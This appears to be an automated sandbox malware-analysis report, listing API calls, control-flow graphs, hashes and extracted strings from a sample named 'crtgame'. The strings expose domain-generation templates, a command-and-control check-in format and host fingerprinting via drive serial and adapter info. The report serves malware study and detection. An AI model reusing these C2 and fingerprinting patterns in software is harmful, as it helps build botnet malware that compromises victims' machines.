                                                                                            • _memset.LIBCMT ref: 02A36DA5
                                                                                            • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02A36DBE
                                                                                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02A36DDD
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02A36DF7
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02A36E02
                                                                                            • _memset.LIBCMT ref: 02A36E4D
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A36E72
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A36E83
                                                                                            • _malloc.LIBCMT ref: 02A36F0A
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A36F1C
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A36F28
                                                                                            • _memset.LIBCMT ref: 02A36F42
                                                                                            • _memset.LIBCMT ref: 02A36F51
                                                                                            • _memset.LIBCMT ref: 02A36F61
                                                                                            • _memset.LIBCMT ref: 02A36F70
                                                                                            • _memset.LIBCMT ref: 02A36F82
                                                                                            • _malloc.LIBCMT ref: 02A36FFC
                                                                                            • _memset.LIBCMT ref: 02A3700D
                                                                                            • _strtok.LIBCMT ref: 02A3702D
                                                                                            • _swscanf.LIBCMT ref: 02A37044
                                                                                            • _strtok.LIBCMT ref: 02A3705B
                                                                                            • Sleep.KERNEL32(000007D0), ref: 02A37162
                                                                                            • _memset.LIBCMT ref: 02A371D6
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A371E3
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A371F5
                                                                                            • _sprintf.LIBCMT ref: 02A3728A
                                                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02A3734E
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02A37382
                                                                                              • Part of subcall function 02A35D1D: _malloc.LIBCMT ref: 02A35D2B
                                                                                            • _malloc.LIBCMT ref: 02A37583
                                                                                            • _memset.LIBCMT ref: 02A3758F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$_malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
                                                                                            • String ID: $%d;$/click/?counter=$<htm$Host: %s$J&D$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
                                                                                            • API String ID: 2018021302-2135968042
                                                                                            • Opcode ID: 5455b0c031f953a33eea0ef84d7ca959b3c79d97b7056796319f804f6063bf72
                                                                                            • Instruction ID: 36e5f8ced3f0f3ba0306aea9b29cc6ddef598dd744b3a8fcc274605e3a096594
                                                                                            • Opcode Fuzzy Hash: 5455b0c031f953a33eea0ef84d7ca959b3c79d97b7056796319f804f6063bf72
                                                                                            • Instruction Fuzzy Hash: 0DD2C7B26587A06ED3119B6C9C81B7FFBECAB8D704F59052DF5D4C6142CE28C606CB92

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 477 2a3f3a0-2a3f3c3 LoadLibraryA 478 2a3f483-2a3f48a 477->478 479 2a3f3c9-2a3f3d7 GetProcAddress 477->479 480 2a3f3dd-2a3f3ed 479->480 481 2a3f47c-2a3f47d FreeLibrary 479->481 482 2a3f3ef-2a3f3fb GetAdaptersInfo 480->482 481->478 483 2a3f433-2a3f43b 482->483 484 2a3f3fd 482->484 486 2a3f444-2a3f449 483->486 487 2a3f43d-2a3f443 call 2a431a8 483->487 485 2a3f3ff-2a3f406 484->485 488 2a3f410-2a3f418 485->488 489 2a3f408-2a3f40c 485->489 491 2a3f477-2a3f47b 486->491 492 2a3f44b-2a3f44e 486->492 487->486 494 2a3f41b-2a3f420 488->494 489->485 493 2a3f40e 489->493 491->481 492->491 496 2a3f450-2a3f455 492->496 493->483 494->494 497 2a3f422-2a3f42f call 2a3f082 494->497 498 2a3f462-2a3f46d call 2a4354c 496->498 499 2a3f457-2a3f45f 496->499 497->483 498->491 504 2a3f46f-2a3f472 498->504 499->498 504->482
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02A3F3B6
                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02A3F3CF
                                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02A3F3F4
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02A3F47D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                            • API String ID: 514930453-3114217049
                                                                                            • Opcode ID: ca110dc9fd7588dd05824d2058029b5be7787b7f45a7efcbd0c7cc467d0511e2
                                                                                            • Instruction ID: e0875d0af8caf12a9dddbafbdc4decba92536c4012a95aabfa1fc18d80eba41e
                                                                                            • Opcode Fuzzy Hash: ca110dc9fd7588dd05824d2058029b5be7787b7f45a7efcbd0c7cc467d0511e2
                                                                                            • Instruction Fuzzy Hash: E521A571E14219AFDB15DBA8D8806EEBBF8BF05324F1441A9F945E7A01EF348945CBA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 505 2a32b95-2a32baf 506 2a32bb1-2a32bb9 call 2a40510 505->506 507 2a32bc7-2a32bcb 505->507 516 2a32bbf-2a32bc2 506->516 508 2a32bdf 507->508 509 2a32bcd-2a32bd0 507->509 512 2a32be2-2a32c11 WSASetLastError WSARecv call 2a39e92 508->512 509->508 511 2a32bd2-2a32bdd call 2a40510 509->511 511->516 519 2a32c16-2a32c1d 512->519 517 2a32d30 516->517 520 2a32d32-2a32d38 517->520 521 2a32c1f-2a32c2a call 2a40510 519->521 522 2a32c2c-2a32c32 519->522 532 2a32c3f-2a32c42 521->532 524 2a32c46-2a32c48 522->524 525 2a32c34-2a32c39 call 2a40510 522->525 526 2a32c4a-2a32c4d 524->526 527 2a32c4f-2a32c60 call 2a40510 524->527 525->532 530 2a32c66-2a32c69 526->530 527->520 527->530 535 2a32c73-2a32c76 530->535 536 2a32c6b-2a32c6d 530->536 532->524 535->517 538 2a32c7c-2a32c9a call 2a40510 call 2a3166f 535->538 536->535 537 2a32d22-2a32d2d call 2a31996 536->537 537->517 545 2a32cbc-2a32cfa WSASetLastError select call 2a39e92 538->545 546 2a32c9c-2a32cba call 2a40510 call 2a3166f 538->546 552 2a32d08 545->552 553 2a32cfc-2a32d06 call 2a40510 545->553 546->517 546->545 556 2a32d15-2a32d17 552->556 557 2a32d0a-2a32d12 call 2a40510 552->557 560 2a32d19-2a32d1d 553->560 556->517 556->560 557->556 560->512
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02A32BE4
                                                                                            • WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02A32C07
                                                                                              • Part of subcall function 02A39E92: WSAGetLastError.WS2_32(?,00000080,00000017,02A33114), ref: 02A39EA0
                                                                                            • WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02A32CD3
                                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02A32CE7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Recvselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 886190287-280543908
                                                                                            • Opcode ID: 778c3259d9706de132005ed88878e6287c81ec2b267e04c56d377dcf2cbe5724
                                                                                            • Instruction ID: 086bb11980dbc880a5da622078dde82afab0aeb10e94e1bc75bd1b60f1b9134d
                                                                                            • Opcode Fuzzy Hash: 778c3259d9706de132005ed88878e6287c81ec2b267e04c56d377dcf2cbe5724
                                                                                            • Instruction Fuzzy Hash: 80417AB19043059FD7229F64CA447ABBBE9EF94354F104D1EF99987280EFB4D940CBA2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 562 2a3f29c-2a3f2c7 CreateFileA 563 2a3f398-2a3f39f 562->563 564 2a3f2cd-2a3f2e2 562->564 565 2a3f2e5-2a3f307 DeviceIoControl 564->565 566 2a3f340-2a3f348 565->566 567 2a3f309-2a3f311 565->567 568 2a3f351-2a3f353 566->568 569 2a3f34a-2a3f350 call 2a431a8 566->569 570 2a3f313-2a3f318 567->570 571 2a3f31a-2a3f31f 567->571 574 2a3f355-2a3f358 568->574 575 2a3f38e-2a3f397 CloseHandle 568->575 569->568 570->566 571->566 572 2a3f321-2a3f329 571->572 576 2a3f32c-2a3f331 572->576 578 2a3f374-2a3f381 call 2a4354c 574->578 579 2a3f35a-2a3f363 GetLastError 574->579 575->563 576->576 581 2a3f333-2a3f33f call 2a3f082 576->581 578->575 586 2a3f383-2a3f389 578->586 579->575 582 2a3f365-2a3f368 579->582 581->566 582->578 585 2a3f36a-2a3f371 582->585 585->578 586->565
                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02A3F2BB
                                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02A3F2F9
                                                                                            • GetLastError.KERNEL32 ref: 02A3F35A
                                                                                            • CloseHandle.KERNELBASE(?), ref: 02A3F391
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                            • API String ID: 4026078076-1180397377
                                                                                            • Opcode ID: b429570a74ee1d5d904d6f7d54a02cc34a628c69b80032997455dae15de38564
                                                                                            • Instruction ID: f1a3d206efcb3140de771195b264102b59bb957b0d963843215cfce50f6a3300
                                                                                            • Opcode Fuzzy Hash: b429570a74ee1d5d904d6f7d54a02cc34a628c69b80032997455dae15de38564
                                                                                            • Instruction Fuzzy Hash: D031B071E10219EFDB25DF94D884AAEBBB8FF44714F2041A9F515E3680DB749A05CB90

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02A35C48
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            • _memset.LIBCMT ref: 02A35C5B
                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02A35C68
                                                                                            • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02A35C70
                                                                                            • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02A35C7C
                                                                                            • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02A35C95
                                                                                            • ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02A35CAA
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02A35CB1
                                                                                            • __time64.LIBCMT ref: 02A35CC5
                                                                                            • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02A35CE2
                                                                                            • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02A35CF7
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02A35CFE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloc_memsetlstrcatlstrcpy
                                                                                            • String ID: C:\ProgramData\rc.dat$\ts.dat
                                                                                            • API String ID: 204396691-2903805982
                                                                                            • Opcode ID: b9f67d46fc8c28140d7e2c8f2cd9c58def92ce16375bb8d8682bacde2d474e42
                                                                                            • Instruction ID: 498b71ee69ed3811cefae749fe47eef02cb8c092f8cb5d426a4c8681a21db47e
                                                                                            • Opcode Fuzzy Hash: b9f67d46fc8c28140d7e2c8f2cd9c58def92ce16375bb8d8682bacde2d474e42
                                                                                            • Instruction Fuzzy Hash: 6121B2729402187FE310AAA8AC88FBFF7ACEF89768F504555F905A3180DF749D0A4B61

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02A31D11
                                                                                            • GetLastError.KERNEL32 ref: 02A31D23
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02A31D59
                                                                                            • GetLastError.KERNEL32 ref: 02A31D6B
                                                                                            • __beginthreadex.LIBCMT ref: 02A31DB1
                                                                                            • GetLastError.KERNEL32 ref: 02A31DC6
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A31DDD
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A31DEC
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02A31E14
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 02A31E1B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                                            • API String ID: 831262434-3017686385
                                                                                            • Opcode ID: 7f77025ac0a61c5e04699d2091c1012c8ee9c56a0469d3c1e2cd0a81a6d7c13f
                                                                                            • Instruction ID: 72b70b7ef62cebc26cc2b5199ce02126ff759dbe57e4c94c8b85ae5e13404cc9
                                                                                            • Opcode Fuzzy Hash: 7f77025ac0a61c5e04699d2091c1012c8ee9c56a0469d3c1e2cd0a81a6d7c13f
                                                                                            • Instruction Fuzzy Hash: 1A316971A443119FD701EF24C888B2BBBE5EF84754F10492AF9599B290EF71D84ACF92

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A34CB6
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34CE2
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34CEE
                                                                                              • Part of subcall function 02A34B18: __EH_prolog.LIBCMT ref: 02A34B1D
                                                                                              • Part of subcall function 02A34B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02A34C1D
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34DBE
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34DC4
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34DCB
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34DD1
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34FD2
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34FD8
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34FE3
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34FEC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 2062355503-0
                                                                                            • Opcode ID: 526694ee27ee8f59312db12145c6d569c0346cdb7476895dd18cc031677156b1
                                                                                            • Instruction ID: f2edd9204ea434af665f9549d8346a50ef290c1d6cbc63cef9cc6d5ae9bb379d
                                                                                            • Opcode Fuzzy Hash: 526694ee27ee8f59312db12145c6d569c0346cdb7476895dd18cc031677156b1
                                                                                            • Instruction Fuzzy Hash: B9B13971D4425DAEDF22DF90C984BEEBBB5AF09314F14409AF805B6280DFB86A49CF51

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A32706
                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02A3272B
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A55553), ref: 02A32738
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02A32778
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A327D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID: timer
                                                                                            • API String ID: 4293676635-1792073242
                                                                                            • Opcode ID: 2d396a9a599e289e8b4adf4e511252978add5c6110d53fb94c4dd05486d9515a
                                                                                            • Instruction ID: 5d28aade6e5d4dcf5ebfc40bb707d2fbfd2ebc55de2b964b3c9dbe6cd450501b
                                                                                            • Opcode Fuzzy Hash: 2d396a9a599e289e8b4adf4e511252978add5c6110d53fb94c4dd05486d9515a
                                                                                            • Instruction Fuzzy Hash: E9317CB1944715EFD311DF25C984B17BBE8FB48724F104A2AF85592A80DB70D814CF91

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 02A3F29C: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02A3F2BB
                                                                                              • Part of subcall function 02A3F29C: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02A3F2F9
                                                                                              • Part of subcall function 02A3F29C: GetLastError.KERNEL32 ref: 02A3F35A
                                                                                              • Part of subcall function 02A3F29C: CloseHandle.KERNELBASE(?), ref: 02A3F391
                                                                                              • Part of subcall function 02A3F3A0: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02A3F3B6
                                                                                              • Part of subcall function 02A3F3A0: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02A3F3CF
                                                                                              • Part of subcall function 02A3F3A0: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02A3F3F4
                                                                                              • Part of subcall function 02A3F3A0: FreeLibrary.KERNEL32(00000000), ref: 02A3F47D
                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02A3F235
                                                                                            • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02A3F256
                                                                                            • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02A3F26A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A3F273
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
                                                                                            • String ID: tLVh
                                                                                            • API String ID: 1378705229-319918027
                                                                                            • Opcode ID: 95c26b17e5dc271b7e02cf4777d77bcd797b07332bf5f1d13989610ffeb4471c
                                                                                            • Instruction ID: cd9b7147057ac454e4e52667369d417913ececf137ee9c6ed1fdf9342456d5e5
                                                                                            • Opcode Fuzzy Hash: 95c26b17e5dc271b7e02cf4777d77bcd797b07332bf5f1d13989610ffeb4471c
                                                                                            • Instruction Fuzzy Hash: EE117C75D40328ABCB119BA8DC88EDEBB79BB09710F000619F515EB180DB705949CB90

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 601 2a329ee-2a32a06 602 2a32ab3-2a32abb call 2a40510 601->602 603 2a32a0c-2a32a10 601->603 612 2a32abe-2a32ac6 602->612 604 2a32a12-2a32a15 603->604 605 2a32a39-2a32a4c WSASetLastError closesocket call 2a39e92 603->605 604->605 607 2a32a17-2a32a36 call 2a40510 call 2a32f50 604->607 611 2a32a51-2a32a55 605->611 607->605 611->602 614 2a32a57-2a32a5f call 2a40510 611->614 619 2a32a61-2a32a67 614->619 620 2a32a69-2a32a71 call 2a40510 614->620 619->620 621 2a32a7b-2a32aad ioctlsocket WSASetLastError closesocket call 2a39e92 619->621 625 2a32a73-2a32a79 620->625 626 2a32aaf-2a32ab1 620->626 621->626 625->621 625->626 626->602 626->612
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02A32A3B
                                                                                            • closesocket.WS2_32(?), ref: 02A32A42
                                                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02A32A89
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02A32A97
                                                                                            • closesocket.WS2_32(?), ref: 02A32A9E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                            • String ID:
                                                                                            • API String ID: 1561005644-0
                                                                                            • Opcode ID: a65842b010f542bf16e3646fdae3b604b868df271edd8ffa4cbe642a907f9d38
                                                                                            • Instruction ID: fccbe78d54b4df92dd5148de06f6dd6831e15cc4d3bde036809003f503d1018e
                                                                                            • Opcode Fuzzy Hash: a65842b010f542bf16e3646fdae3b604b868df271edd8ffa4cbe642a907f9d38
                                                                                            • Instruction Fuzzy Hash: A1212871E00315ABEB25ABB8898476EB7E9EF44315F10896AF945D7240FFB0CD418B61

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 628 2a31ba7-2a31bcf call 2a54df0 RtlEnterCriticalSection 631 2a31bd1 628->631 632 2a31be9-2a31bf7 RtlLeaveCriticalSection call 2a3dcbc 628->632 633 2a31bd4-2a31be0 call 2a31b79 631->633 634 2a31bfa-2a31c20 RtlEnterCriticalSection 632->634 640 2a31be2-2a31be7 633->640 641 2a31c55-2a31c6e RtlLeaveCriticalSection 633->641 636 2a31c34-2a31c36 634->636 638 2a31c22-2a31c2f call 2a31b79 636->638 639 2a31c38-2a31c43 636->639 643 2a31c45-2a31c4b 638->643 646 2a31c31 638->646 639->643 640->632 640->633 643->641 645 2a31c4d-2a31c51 643->645 645->641 646->636
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A31BAC
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02A31BBC
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02A31BEA
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02A31C13
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02A31C56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 1633115879-0
                                                                                            • Opcode ID: 7d82a4eea781b1f225446f94066b8c42bf4c1d44a577b117923167913cda035b
                                                                                            • Instruction ID: fdd65d1a63623a1a72875d1296f2d10f7f1ff00cc94a21f67d4ed9ef298c1086
                                                                                            • Opcode Fuzzy Hash: 7d82a4eea781b1f225446f94066b8c42bf4c1d44a577b117923167913cda035b
                                                                                            • Instruction Fuzzy Hash: 2B218975A00314AFCB16CF68D984BAABBB5FF48714F108589FC59A7301DB74E906CBA0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,02A3358B,?,?,?,?,?,?,?,02A38FA9,?), ref: 02A32EEE
                                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02A32EFD
                                                                                            • WSAGetLastError.WS2_32(?,02A3358B,?,?,?,?,?,?,?,02A38FA9,?,?,?,00000001,00000006,?), ref: 02A32F0C
                                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02A32F36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 2093263913-0
                                                                                            • Opcode ID: e6e1ed79377e5d3198cef0296159573cc5e59ec8ff6ad94c70d4ffb9397730ab
                                                                                            • Instruction ID: eed87096b5c103c3fcdc5a4ec5142b65074f3fa40d774a38971fbd5dca1b516f
                                                                                            • Opcode Fuzzy Hash: e6e1ed79377e5d3198cef0296159573cc5e59ec8ff6ad94c70d4ffb9397730ab
                                                                                            • Instruction Fuzzy Hash: F7017571A40314BBDB205F65DC88B5FBBA9EB85771F008965FA08DB141DF70C8018BA1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
